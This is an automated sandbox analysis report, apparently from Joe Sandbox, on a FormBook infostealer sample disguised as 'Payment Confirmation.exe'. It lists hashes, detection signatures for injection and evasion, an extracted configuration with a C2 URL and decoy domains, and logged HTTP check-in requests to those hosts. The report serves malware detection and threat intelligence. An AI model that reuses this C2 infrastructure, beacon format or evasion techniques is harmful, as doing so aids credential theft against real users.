Windows Analysis Report Payment Confirmation.exe

Overview

General Information

Sample Name: Payment Confirmation.exe
Analysis ID: 502129
MD5: 98ffc3c812e6cec919ebd286973e2002
SHA1: b0d1a65445a7923870ad23ec4d80f592e808c987
SHA256: 014d0ece0d472eaea73698d634308303ddb9f227f39d339a66416c3cb744d2c1
Tags: exeformbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for domain / URL
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Self deletion via cmd delete
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
Executable has a suspicious name (potential lure to open the executable)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.thesewhitevvalls.com/b2c0/"], "decoy": ["bjyxszd520.xyz", "hsvfingerprinting.com", "elliotpioneer.com", "bf396.com", "chinaopedia.com", "6233v.com", "shopeuphoricapparel.com", "loccssol.store", "truefictionpictures.com", "playstarexch.com", "peruviancoffee.store", "shobhajoshi.com", "philme.net", "avito-rules.com", "independencehomecenters.com", "atp-cayenne.com", "invetorsbank.com", "sasanos.com", "scentfreebnb.com", "catfuid.com", "sunshinefamilysupport.com", "madison-co-atty.net", "newhousebr.com", "newstodayupdate.com", "kamalaanjna.com", "itpronto.com", "hi-loentertainment.com", "sadpartyrentals.com", "vertuminy.com", "khomayphotocopy.club", "roleconstructora.com", "cottonhome.online", "starsspell.com", "bedrijfs-kledingshop.com", "aydeyahouse.com", "miaintervista.com", "taolemix.com", "lnagvv.space", "bjmobi.com", "collabkc.art", "onayli.net", "ecostainable.com", "vi88.info", "brightlifeprochoice.com", "taoluzhibo.info", "techgobble.com", "ideemimarlikinsaat.com", "andajzx.com", "shineshaft.website", "arroundworld.com", "reyuzed.com", "emilfaucets.com", "lumberjackguitarloops.com", "pearl-interior.com", "altitudebc.com", "cqjiubai.com", "kutahyaescortbayanlarim.xyz", "metalworkingadditives.online", "unasolucioendesa.com", "andrewfjohnston.com", "visionmark.net", "dxxlewis.com", "carts-amazon.com", "anadolu.academy"]}
Multi AV Scanner detection for submitted file
Source: Payment Confirmation.exe Virustotal: Detection: 24% Perma Link
Source: Payment Confirmation.exe ReversingLabs: Detection: 20%
Yara detected FormBook
Source: Yara match File source: 4.1.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.Payment Confirmation.exe.2320000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.1.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.Payment Confirmation.exe.2320000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.625496458.0000000000670000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.437063971.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.403569789.000000000DD52000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.625629536.00000000006A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.437002707.00000000008B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.366975255.0000000002320000.00000004.00000001.sdmp, type: MEMORY
Multi AV Scanner detection for domain / URL
Source: www.thesewhitevvalls.com Virustotal: Detection: 6% Perma Link
Machine Learning detection for sample
Source: Payment Confirmation.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 1.2.Payment Confirmation.exe.2320000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 11.2.msiexec.exe.49f796c.3.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.2.Payment Confirmation.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.1.Payment Confirmation.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

barindex
Uses 32bit PE files
Source: Payment Confirmation.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: msiexec.pdb source: Payment Confirmation.exe, 00000004.00000002.438290968.0000000000E60000.00000040.00020000.sdmp
Source: Binary string: msiexec.pdbGCTL source: Payment Confirmation.exe, 00000004.00000002.438290968.0000000000E60000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: Payment Confirmation.exe, 00000001.00000003.364311124.000000000F080000.00000004.00000001.sdmp, Payment Confirmation.exe, 00000004.00000002.437196803.0000000000960000.00000040.00000001.sdmp, msiexec.exe, 0000000B.00000002.628302033.00000000044C0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: Payment Confirmation.exe, msiexec.exe
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_00405E93 FindFirstFileA,FindClose, 1_2_00405E93
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 1_2_004054BD
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_00402671 FindFirstFileA, 1_2_00402671

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49810 -> 172.105.103.207:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49810 -> 172.105.103.207:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49810 -> 172.105.103.207:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49843 -> 134.122.133.171:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49843 -> 134.122.133.171:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49843 -> 134.122.133.171:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 52.206.159.80 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 45.91.80.182 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.thesewhitevvalls.com
Source: C:\Windows\explorer.exe Domain query: www.lumberjackguitarloops.com
Source: C:\Windows\explorer.exe Domain query: www.elliotpioneer.com
Source: C:\Windows\explorer.exe Domain query: www.carts-amazon.com
Source: C:\Windows\explorer.exe Domain query: www.chinaopedia.com
Source: C:\Windows\explorer.exe Network Connect: 3.223.115.185 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.anadolu.academy
Source: C:\Windows\explorer.exe Domain query: www.playstarexch.com
Source: C:\Windows\explorer.exe Network Connect: 172.105.103.207 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 62.210.5.81 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.altitudebc.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 94.73.147.156 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.unasolucioendesa.com
Source: C:\Windows\explorer.exe Domain query: www.atp-cayenne.com
Source: C:\Windows\explorer.exe Network Connect: 82.98.134.154 80 Jump to behavior
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.thesewhitevvalls.com/b2c0/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ASIANETGB ASIANETGB
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=F+Gco1RpPHjV7dNAzyydjUzXzSLtfZhJDs/JobGsDdyJLAnfgLPEsB5vVRHdlMy1JFBV4EP6qw== HTTP/1.1Host: www.playstarexch.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /b2c0/?EN9pK2=oisE9+VmZgmAkkrchIKqNWGyfJvkxHxTzu9sANYqnymeIWLgjiN74zWNndmykH/eOqLqSG+txg==&nZR4=4hr8Pfz HTTP/1.1Host: www.anadolu.academyConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=Tgem/L35NV+dfrLXgk9e0bf+TOX6XAT/DQQ171WvvWAafG5cKA0QEsXJDfpFnN+dx51z362pVQ== HTTP/1.1Host: www.altitudebc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /b2c0/?EN9pK2=nxasyuVnQv2XAhCx9zKAxU4oBW67ilDivwaG6+ZxC2XBQxj4p4XVuU/9/EEmkzFjfVH8yNww+g==&nZR4=4hr8Pfz HTTP/1.1Host: www.unasolucioendesa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=/Ci6lA1wHDq9VFgkYzq6dZWl1lKVRbc/m6zzwdji+NobEq0OLQXkZXfSz/GKNzBGFBcC52wWgA== HTTP/1.1Host: www.elliotpioneer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /b2c0/?EN9pK2=Rsl6eVz8IBrCXPhLu4YLklwV2F0wFlRiIbasvGTIitkrxs2ugDluNYG7ptidipeQIllJsRrQVw==&nZR4=4hr8Pfz HTTP/1.1Host: www.thesewhitevvalls.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=Evx8EsBGe658r9iJtrgJltnDGszJP9p4seEC1w1oB9OxckrwwA+TpfgbJDcWmrfnS5cDyGsxIQ== HTTP/1.1Host: www.lumberjackguitarloops.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /b2c0/?EN9pK2=HN6lmWAsN4eOR9yN7lRwrlIaFZSjtluPDfuHRsVFTQ6SUbSrxCD+Omdw+9AgIy4ohKSIyg89VQ==&nZR4=4hr8Pfz HTTP/1.1Host: www.carts-amazon.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=qdiIlJa1sa0FYbjdkssa7+Uw/DbrhXlci2BZlXFuRXTISdQByqYUnROnYc602mbs2qASatieoQ== HTTP/1.1Host: www.chinaopedia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /b2c0/?EN9pK2=ESINuQxl50fq+oqp7R8PJEZRcvMrOgZYniX8ZAjuMgliJzJjCEYTKkgZH+GsrKs/YLP3GwXWaQ==&nZR4=4hr8Pfz HTTP/1.1Host: www.atp-cayenne.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 52.206.159.80 52.206.159.80
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 13 Oct 2021 14:32:21 GMTContent-Type: text/htmlContent-Length: 275ETag: "615f93b1-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Pragma: no-cacheContent-Type: text/htmlContent-Length: 1237Date: Wed, 13 Oct 2021 14:32:26 GMTServer: LiteSpeedVary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 13 Oct 2021 14:32:42 GMTContent-Type: text/htmlContent-Length: 275ETag: "615f93b1-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 13 Oct 2021 14:33:00 GMTContent-Type: text/htmlContent-Length: 275ETag: "615f93b1-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: Payment Confirmation.exe String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: Payment Confirmation.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000005.00000000.370640534.000000000095C000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: msiexec.exe, 0000000B.00000002.630481531.0000000004B72000.00000004.00020000.sdmp String found in binary or memory: http://www.litespeedtech.com/error-page
Source: unknown DNS traffic detected: queries for: www.playstarexch.com
Source: global traffic HTTP traffic detected: GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=F+Gco1RpPHjV7dNAzyydjUzXzSLtfZhJDs/JobGsDdyJLAnfgLPEsB5vVRHdlMy1JFBV4EP6qw== HTTP/1.1Host: www.playstarexch.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /b2c0/?EN9pK2=oisE9+VmZgmAkkrchIKqNWGyfJvkxHxTzu9sANYqnymeIWLgjiN74zWNndmykH/eOqLqSG+txg==&nZR4=4hr8Pfz HTTP/1.1Host: www.anadolu.academyConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=Tgem/L35NV+dfrLXgk9e0bf+TOX6XAT/DQQ171WvvWAafG5cKA0QEsXJDfpFnN+dx51z362pVQ== HTTP/1.1Host: www.altitudebc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /b2c0/?EN9pK2=nxasyuVnQv2XAhCx9zKAxU4oBW67ilDivwaG6+ZxC2XBQxj4p4XVuU/9/EEmkzFjfVH8yNww+g==&nZR4=4hr8Pfz HTTP/1.1Host: www.unasolucioendesa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=/Ci6lA1wHDq9VFgkYzq6dZWl1lKVRbc/m6zzwdji+NobEq0OLQXkZXfSz/GKNzBGFBcC52wWgA== HTTP/1.1Host: www.elliotpioneer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /b2c0/?EN9pK2=Rsl6eVz8IBrCXPhLu4YLklwV2F0wFlRiIbasvGTIitkrxs2ugDluNYG7ptidipeQIllJsRrQVw==&nZR4=4hr8Pfz HTTP/1.1Host: www.thesewhitevvalls.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=Evx8EsBGe658r9iJtrgJltnDGszJP9p4seEC1w1oB9OxckrwwA+TpfgbJDcWmrfnS5cDyGsxIQ== HTTP/1.1Host: www.lumberjackguitarloops.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /b2c0/?EN9pK2=HN6lmWAsN4eOR9yN7lRwrlIaFZSjtluPDfuHRsVFTQ6SUbSrxCD+Omdw+9AgIy4ohKSIyg89VQ==&nZR4=4hr8Pfz HTTP/1.1Host: www.carts-amazon.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=qdiIlJa1sa0FYbjdkssa7+Uw/DbrhXlci2BZlXFuRXTISdQByqYUnROnYc602mbs2qASatieoQ== HTTP/1.1Host: www.chinaopedia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /b2c0/?EN9pK2=ESINuQxl50fq+oqp7R8PJEZRcvMrOgZYniX8ZAjuMgliJzJjCEYTKkgZH+GsrKs/YLP3GwXWaQ==&nZR4=4hr8Pfz HTTP/1.1Host: www.atp-cayenne.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a DirectInput object (often for capturing keystrokes)
Source: Payment Confirmation.exe, 00000001.00000002.366842319.00000000007FA000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_00404FC2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 1_2_00404FC2

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 4.1.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.Payment Confirmation.exe.2320000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.1.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.Payment Confirmation.exe.2320000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.625496458.0000000000670000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.437063971.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.403569789.000000000DD52000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.625629536.00000000006A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, type: MEMORY
